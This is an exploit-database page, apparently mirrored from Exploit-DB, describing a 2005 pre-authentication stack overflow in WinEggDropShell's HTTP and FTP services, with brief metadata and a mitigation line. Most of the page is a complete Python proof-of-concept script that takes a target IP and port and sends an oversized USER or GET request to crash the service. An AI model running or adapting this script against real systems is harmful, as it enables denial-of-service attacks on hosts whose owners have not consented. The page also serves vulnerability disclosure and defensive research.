header-logo
Suggest Exploit
vendor:
WinEggDropShell
by:
Sowhat
7.5
CVSS
HIGH
Stack Overflow
121
CWE
Product Name: WinEggDropShell
Affected Version From: Eterntiy version
Affected Version To: Eterntiy version
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2005

WinEggDropShell Multipe PreAuth Remote Stack Overflow PoC

WinEggDropShell is vulnerable to a stack overflow vulnerability when sending a specially crafted USER or GET command. This can be exploited to cause a denial of service condition by crashing the application.

Mitigation:

Upgrade to the latest version of WinEggDropShell.
Source

Exploit-DB raw data:

# WinEggDropShell Multipe PreAuth Remote Stack Overflow PoC
# HTTP Server "GET"  && FTP Server "USER" "PASS" command
# Bug Discoverd and coded by Sowhat
# Greetingz to killer,baozi,Darkeagle,all 0x557 and XFocus guys....;)
# http://secway.org
# 2005-10-11

# Affected:
# WinEggDropShell Eterntiy version
# Other version may be vulnerable toooooo

import sys
import string
import socket

if (len(sys.argv) != 4):
	
	print "##########################################################################"
	print "#      WinEggDropShell Multipe PreAuth Remote Stack Overflow PoC         #"
	print "#          This Poc will BOD the vulnerable target                       #"
	print "#          Bug Discoverd and coded  by Sowhat                            #"
	print "#                 http://secway.org                                      #"
	print "##########################################################################"
	print "\nUsage: " + sys.argv[0] + "HTTP/FTP" + " TargetIP" + " Port\n"
	print "Example: \n" + sys.argv[0] + " HTTP" + " 1.1.1.1" + " 80" 
	print sys.argv[0] + " FTP" + " 1.1.1.1" + " 21" 
	sys.exit(0)

host = sys.argv[2]
port = string.atoi(sys.argv[3])

if ((sys.argv[1] == "FTP") | (sys.argv[1] == "ftp")):

		request = "USER " + 'A'*512 + "\r"

if ((sys.argv[1] == "HTTP") | (sys.argv[1] == "http")):

		request = "GET /" + 'A'*512 + " HTTP/1.1 \r\n" 

exp = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
exp.connect((host,port))
exp.send(request)

# milw0rm.com [2005-12-02]

Navigation

Suggest Exploit

Services By CQR